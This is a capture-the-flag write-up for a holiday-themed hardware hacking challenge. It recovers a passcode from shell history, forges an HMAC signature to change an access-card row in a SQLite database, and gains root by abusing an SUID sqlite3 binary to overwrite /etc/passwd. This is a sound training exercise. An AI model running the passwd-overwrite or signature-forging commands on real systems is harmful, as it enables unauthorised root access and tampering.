Hardware Hacking 101 Part 2
Difficulty:
Shown in Report
Santa’s gone missing, and the only way to track him is by accessing the Wish List in his chest—modify the access_cards database to gain entry!
Objective Image
Back
Challenge

This is the second part from objective Hardware Hacking 101

Solution
Silver medal

Hidden in Plain Sight Hints: It is so important to keep sensitive data like passwords secure. Often times, when typing passwords into a CLI (Command Line Interface) they get added to log files and other easy to access locations. It makes it trivial to step back in history and identify the password.

We boot the system (‘Startup system default’). First, let's take a look at the command line history:

slh@slhconsole\> history 
    1  cd /var/www/html
...
   10  slg --config
   11  slh --passcode CandyCaneCrunch77 --set-access 1 --id 143

We can also use the password from that previous session:

slh@slhconsole\> slh --passcode CandyCaneCrunch77 --set-access 1 --id 42
...
Card 42 granted access level 1.

There’s a tougher route if you're up for the challenge to earn the Gold medal. It involves directly modifying the database and generating your own HMAC signature.

Gold medal

It's In the Signature Hints: I seem to remember there being a handy HMAC generator included in CyberChef.

We find the SQLite database in the file system and take a closer look at it:

slh@slhconsole\> ls     
access_cards

slh@slhconsole\> file access_cards 
access_cards: SQLite 3.x database, last written using SQLite version 3040001, file counter 8, database pages 32, cookie 0x2, schema 4, UTF-8, version-valid-for 8

slh@slhconsole\> sqlite3 access_cards
sqlite> .header on
sqlite> .tables
access_cards  config
sqlite> select * from config;
1|hmac_secret|9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e
2|hmac_message_format|{access}{uuid}
3|admin_password|3a40ae3f3fd57b2a4513cca783609589dbe51ce5e69739a33141c5717c20c9c1
4|app_version|1.0
sqlite> select * from access_cards where id=42;
id|uuid|access|sig
42|c06018b6-5e80-4395-ab71-ae5124560189|0|ecb9de15a057305e5887502d46d434c9394f5ed7ef1a51d2930ad786b02f6ffd

An HMAC (hash-based message authentication code) involves a cryptographic hash function and a secret cryptographic key. It can be used to verify both the data integrity and authenticity of data.
If we use the value from hmac_secret as the key and enter the message with the format {access}{uuid} (without brackets), we can use CyberChef to create a valid signature.

Screenshot 2024-11-14 130913.jpg

sqlite> update access_cards set access=1, sig='135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096' where id = 42;

Brilliant work! We now have access to… the Wish List! I couldn't have done it without you—thank you so much!

Platinum medal

I found a way to completely root the machine. This is based on sqlite SUID root being installed, see gtfobins. We use the built-in function to write files and overwrite /etc/passwd to gain root access.

slh@slhconsole\> LFILE=/etc/passwd
slh@slhconsole\> sqlite3 /dev/null -cmd ".output $LFILE" 'select "user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash";'
slh@slhconsole\> su user3
(password: 123)
Password: 
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
user3@1a0597267c1e:/home/slh# id -a
uid=0(user3) gid=0(root) groups=0(root)
user3@1a0597267c1e:/home/slh#